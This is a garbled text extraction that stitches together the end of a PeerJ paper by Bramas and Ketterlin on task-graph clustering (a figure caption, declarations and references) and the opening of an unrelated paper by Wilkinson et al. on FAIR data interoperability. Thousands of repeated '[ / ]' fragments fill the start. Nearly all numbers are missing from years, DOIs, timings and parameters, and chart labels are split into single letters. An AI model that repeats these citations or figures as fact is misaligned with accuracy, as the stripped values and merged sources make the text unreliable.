[ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] figure a clustering of a graph of nodes generated by the transport equation on a disk. the clus- ter size is m = . there are clusters. full-size doi: . /peerjcs. /fig- bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] [ / ] (a) total time = . s w o rk er w o rk er w o rk er w o rk er w o rk er w o rk er w o rk er w o rk er s u b m it ed r ea d y (b) total time = . s w o rk er w o rk er w o rk er w o rk er w o rk er w o rk er w o rk er w o rk er s u b m it ed r ea d y (c) figure a example of the polybench jacobi d clustering and execution. the graph was generated with parameter iter = and n = . the execution time obtained with granularity, (c), is slower than without granularity, (b), because the overhead is limited and the dependencies makes it difficult to find a meta- graph where the parallelism is not constraint. (a) clustered graph with m = . original graph has , nodes and estimated degree of parallelism of , clustered one has nodes and estimated degree of par- allelism of . . (b) emulation of the execution of the original graph with threads in units of time. each original task has a cost of , the overhead are per task, . per push and . per pop. (c) emulation of the execution of the clustered graph with threads in . units of time. each original task has a cost of , the overhead are per task, . per push and . per pop. full-size doi: . /peerjcs. /fig- additional information and declarations funding the authors received no funding for this work. bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. competing interests the authors declare there are no competing interests. author contributions • bérenger bramas conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • alain ketterlin analyzed the data, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: an implementation of our method is publicly available at https://gitlab.inria.fr/bramas/ dagpar. the graphs used in this project are available at https://figshare.com/projects/ dagpar/ . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references agullo e, aumage o, bramas b, coulaud o, pitoiset s. . bridging the gap between openmp and task-based runtime systems for the fast multipole method. ieee transactions on parallel and distributed systems ( ): – doi . /tpds. . . agullo e, bramas b, coulaud o, darve e, messner m, takahashi t. . task-based fmm for heterogeneous architectures. concurrency and computation: practice and experience ( ): – doi . /cpe. . agullo e, buttari a, guermouche a, lopez f. . task-based multifrontal qr solver for gpu-accelerated multicore architectures. in: ieee nd international conference on high performance computing (hipc). piscataway: ieee, – doi . /hipc. . . augonnet c, thibault s, namyst r, wacrenier p-a. . starpu: a unified platform for task scheduling on heterogeneous multicore architectures. concurrency and computation: practice and experience ( ): – doi . /cpe. . bauer m, treichler s, slaughter e, aiken a. . legion: expressing locality and independence with logical regions. in: international conference on high performance computing, networking, storage and analysis. piscataway: ieee, . bramas b. . optimization and parallelization of the boundary element method for the wave equation in time domain. phd thesis, bordeaux university. bramas b. a. impact study of data locality on task-based applications through the heteroprio scheduler. peerj computer science :e doi . /peerj-cs. . bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://gitlab.inria.fr/bramas/dagpar https://gitlab.inria.fr/bramas/dagpar https://figshare.com/projects/dagpar/ https://figshare.com/projects/dagpar/ http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /tpds. . http://dx.doi.org/ . /cpe. http://dx.doi.org/ . /hipc. . http://dx.doi.org/ . /cpe. http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. bramas b. b. increasing the degree of parallelism using speculative execution in task-based runtime systems. peerj computer science :e doi . /peerj-cs. . carpaye jmc, roman j, brenner p. . design and analysis of a task-based parallelization over a runtime system of an explicit finite-volume cfd code with adaptive time stepping. journal of computational science : – doi . /j.jocs. . . . cong j, li z, bagrodia r. . acyclic multi-way partitioning of boolean networks. in: st design automation conference. – doi . / . . coulette d, franck e, helluy p, mehrenberger m, navoret l. . high-order implicit palindromic discontinuous galerkin method for kinetic-relaxation approximation. comput. & fluids : – doi . /j.compfluid. . . . danalis a, bosilca g, bouteiller a, herault t, dongarra j. . ptg: an abstraction for unhindered parallelism. in: proceedings of the fourth international workshop on domain-specific languages and high-level frameworks for high performance computing, (wolfhpc), ieee. piscataway: ieee, – . fiduccia cm, mattheyses rm. . a linear-time heuristic for improving network par- titions. in: th design automation conference. – doi . /dac. . . gautier t, lima jvf, maillard n, raffin b. . xkaapi: a runtime system for data-flow task programming on heterogeneous architectures. in: ieee th international symposium on parallel & distributed processing (ipdps). ieee, – . grauer-gray s, xu l, searles r, ayalasomayajula s, cavazos j. . auto-tuning a high-level language targeted to gpu codes. in: innovative parallel computing (inpar). – doi . /inpar. . . hendrickson b, kolda tg. . graph partitioning models for parallel computing. parallel computing ( ): – doi . /s - ( ) -x. hendrickson b, leland r. . a multi-level algorithm for partitioning graphs. in: supercomputing ’ :proceedings of the acm/ieee conference on supercomputing. piscataway: ieee, – doi . /superc. . . herrmann j, kho j, uçar b, kaya k, catalyurek u. . acyclic partitioning of large directed acyclic graphs. in: th ieee/acm international symposium on cluster, cloud and grid computing (ccgrid). piscataway: ieee, – doi . /ccgrid. . . johnson ds, garey mr. . computers and intractability: a guide to the theory of np- completeness. new york: wh freeman. karypis g, aggarwa r, kumar v, shekhar s. . multilevel hypergraph partitioning: applications in vlsi domain. ieee transactions on very large scale integration (vlsi) systems ( ): – doi . / . . karypis g, kumar v. . a fast and high quality multilevel scheme for parti- tioning irregular graphs. siam journal on scientific computing ( ): – doi . /s . kernighan b, lin s. . an efficient heuristic procedure for partitioning graphs. the bell system technical journal ( ): – doi . /j. - . .tb .x. bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /j.jocs. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /j.compfluid. . . http://dx.doi.org/ . /dac. . http://dx.doi.org/ . /inpar. . http://dx.doi.org/ . /s - ( ) -x http://dx.doi.org/ . /superc. . http://dx.doi.org/ . /ccgrid. . http://dx.doi.org/ . / . http://dx.doi.org/ . /s http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /peerj-cs. kernighan bw. . optimal sequential partitions of graphs. journal of the acm ( ): – doi . / . . kestor g, gioiosa r, chavarra-miranda d. . prometheus: scalable and accurate em- ulation of task-based applications on many-core systems. in: ieee international symposium on performance analysis of systems and software (ispass). piscataway: ieee, – doi . /ispass. . . moustafa s, kirschenmann w, dupros f, aochi h. . task-based programming on emerging parallel architectures for finite-differences seismic numerical kernel. in: aldinucci m, padovani l, torquati m, eds. euro-par : parallel processing. cham: springer international publishing, – . myllykoski m, mikkelsen cck. . introduction to starneig—a task-based library for solving nonsymmetric eigenvalue problems. arxiv preprint. arxiv: . . openmp architecture review board. . openmp application program interface version . . available at http://www.openmp.org/wp-content/uploads/openmp . . .pdf . perez jm, badia rm, labarta j. . a dependency-aware task-based programming environment for multi-core architectures. in: ieee international conference on cluster computing. ieee, – . pothen a, alvarado lf. . a fast reordering algorithm for parallel sparse triangular solution. siam journal on scientific and statistical computing ( ): – doi . / . purna kmg, bhatia d. . temporal partitioning and scheduling data flow graphs for reconfigurable computers. ieee transactions on computers ( ): – doi . / . . rossignon c. . un modéle de programmation á grain fin pour la parallélisation de solveurs linéaires creux. phd thesis, bordeaux university. rossignon c, pascal h, aumage o, thibault s. . a numa-aware fine grain par- allelization framework for multi-core architecture. in: ieee international symposium on parallel distributed processing, workshops and phd forum. piscataway: ieee, – doi . /ipdpsw. . . sarkar v. . partitioning and scheduling parallel programs for multiprocessors. cam- bridge: mit press. sarkar v, hennessy j. . partitioning parallel programs for macro-dataflow. technical report. stanford univ ca computer systems lab. schaeffer se. . survey: graph clustering. computer science review ( ): – doi . /j.cosrev. . . . shun j, roosta-khorasani f, fountoulakis k, mahoney mw. . parallel local graph clustering. arxiv preprint. arxiv: . . sukkari d, ltaief h, faverge m, keyes d. . asynchronous task-based polar decom- position on single node manycore architectures. ieee transactions on parallel and distributed systems ( ): – doi . /tpds. . . suter f. . daggen: a synthethic task graph generator. available at https://github. com/frs wq/daggen (accessed on january ). bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . /ispass. . http://arxiv.org/abs/ . http://www.openmp.org/wp-content/uploads/openmp . . .pdf http://www.openmp.org/wp-content/uploads/openmp . . .pdf http://dx.doi.org/ . / http://dx.doi.org/ . / . http://dx.doi.org/ . /ipdpsw. . http://dx.doi.org/ . /j.cosrev. . . http://arxiv.org/abs/ . http://dx.doi.org/ . /tpds. . https://github.com/frs wq/daggen https://github.com/frs wq/daggen http://dx.doi.org/ . /peerj-cs. tagliavini g, cesarini d, marongiu a. . unleashing fine-grained paral- lelism on embedded many-core accelerators with lightweight openmp task- ing. ieee transactions on parallel and distributed systems ( ): – doi . /tpds. . . tillenius m. . superglue: a shared memory framework using data versioning for dependency-aware task-based parallelization. siam journal on scientific computing ( ):c –c doi . / . xu d, tian y. . a comprehensive survey of clustering algorithms. annals of data science ( ): – doi . /s - - - . bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tpds. . http://dx.doi.org/ . / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. submitted october accepted march published april corresponding author mark d. wilkinson, markw@illuminae.com academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright wilkinson et al. distributed under creative commons cc-by . open access interoperability and fairness through a novel combination of web technologies mark d. wilkinson , ruben verborgh , luiz olavo bonino da silva santos , tim clark , , morris a. swertz , fleur d.l. kelpin , alasdair j.g. gray , erik a. schultes , erik m. van mulligen , paolo ciccarese , arnold kuzniar , anand gavai , mark thompson , rajaram kaliyaperumal , jerven t. bolleman and michel dumontier center for plant biotechnology and genomics upm-inia, universidad politécnica de madrid, madrid, spain imec, ghent university, ghent, belgium dutch techcentre for life sciences, utrecht, the netherlands department of neurology, massachusetts general hospital, boston, ma, united states of america department of neurology, harvard medical school, boston, united states of america genomics coordination center and department of genetics, university medical center groningen, groningen, the netherlands department of computer science, school of mathematical and computer sciences, heriot-watt university, edinburgh, united kingdom fair data, dutch techcenter for life science, utrecht, the netherlands department of medical informatics, erasmus university medical center, rotterdam, the netherlands elmer innovation lab, harvard medical school, boston, united states of america netherlands escience center, amsterdam, the netherlands department of human genetics, leiden university medical center, leiden, the netherlands swiss-prot group, sib swiss institute of bioinformatics, centre medical universitaire, geneva, switzerland stanford center for biomedical informatics research, stanford university school of medicine, stanford, ca, united states of america abstract data in the life sciences are extremely diverse and are stored in a broad spectrum of repositories ranging from those designed for particular data types (such as kegg for pathway data or uniprot for protein data) to those that are general-purpose (such as figshare, zenodo, dataverse or eudat). these data have widely different levels of sensitivity and security considerations. for example, clinical observations about genetic mutations in patients are highly sensitive, while observations of species diversity are generally not. the lack of uniformity in data models from one repository to another, and in the richness and availability of metadata descriptions, makes integration and analysis of these data a manual, time-consuming task with no scalability. here we explore a set of resource-oriented web design patterns for data discovery, accessibility, transformation, and integration that can be implemented by any general- or special- purpose repository as a means to assist users in finding and reusing their data holdings. we show that by using off-the-shelf technologies, interoperability can be achieved atthe level of an individual spreadsheet cell. we note that the behaviours of this architecture compare favourably to the desiderata defined by the fair data principles, and can therefore represent an exemplar implementation of those principles. the proposed interoperability design patterns may be used to improve discovery and integration of both new and legacy data, maximizing the utility of all scholarly outputs. how to cite this article wilkinson et al. ( ), interoperability and fairness through a novel combination of web technologies. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:markw@illuminae.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. subjects bioinformatics, data science, databases, emerging technologies, world wide web and web science keywords fair data, interoperability, data integration, semantic web, linked data, rest introduction carefully-generated data are the foundation for scientific conclusions, new hypotheses, discourse, disagreement and resolution of these disagreements, all of which drive scientific discovery. data must therefore be considered, and treated, as first-order scientific output, upon which there may be many downstream derivative works, among these, the familiar research article (starr et al., ). but as the volume and complexity of data continue to grow, a data publication and distribution infrastructure is beginning to emerge that is not ad hoc, but rather explicitly designed to support discovery, accessibility, (re)coding to standards, integration, machine-guided interpretation, and re-use. in this text, we use the word ‘‘data’’ to mean all digital research artefacts, whether they be data (in the traditional sense), research-oriented digital objects such as workflows, or combinations/packages of these (i.e., the concept of a ‘‘research object’’, (bechhofer et al., )). effectively, all digital entities in the research data ecosystem will be considered data by this manuscript. further, we intend ‘‘data’’ to include both data and metadata, and recognize that the distinction between the two is often user-dependent. data, of all types, are often published online, where the practice of open data publication is being encouraged by the scholarly community, and increasingly adopted as a requirement of funding agencies (stein et al., ). such publications utilize either a special-purpose repository (e.g., model-organism or molecular data repositories) or increasingly commonly will utilize general-purpose repositories such as figshare, zenodo, dataverse, eudat or even institutional repositories. special-purpose repositories generally receive dedicated funding to curate and organize data, and have specific query interfaces and apis to enable exploration of their content. general-purpose repositories, on the other hand, allow publication of data in arbitrary formats, with little or no curation and often very little structured metadata. both of these scenarios pose a problem with respect to interoperability. while apis allow mechanized access to the data holdings of a special-purpose repository, each repository has its own api, thus requiring specialized software to be created for each cross-repository query. moreover, the ontological basis of the curated annotations are not always transparent (neither to humans nor machines), which hampers automated integration. general purpose repositories are less likely to have rich apis, thus often requiring manual discovery and download; however, more importantly, the frequent lack of harmonization of the file types/formats and coding systems in the repository, and lack of curation, results in much of their content being unusable (roche et al., ). previous projects, specifically in the bio/medical domain, that have attempted to achieve deep interoperability include cabio (covitz et al., ) and tapir (de giovanni et al., ). the former created a rich soap-based api, enforcing a common interface over all repositories. the latter implemented a domain-specific query language that all participating repositories should respond to. these initiatives successfully enabled wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. powerful cross-resource data exploration and integration; however, this was done at the expense of broad-scale uptake, partly due to the complexity of implementation, and/or required the unavoidable participation of individual data providers, who are generally resource-strained. moreover, in both cases, the interoperability was aimed at a specific field of study (cancer, and biodiversity respectively), rather than a more generalized interoperability goal spanning all domains. with respect to more general-purpose approaches, and where ‘lightweight’ interoperability was considered acceptable, mygrid (stevens, robinson & goble, ) facilitated discovery 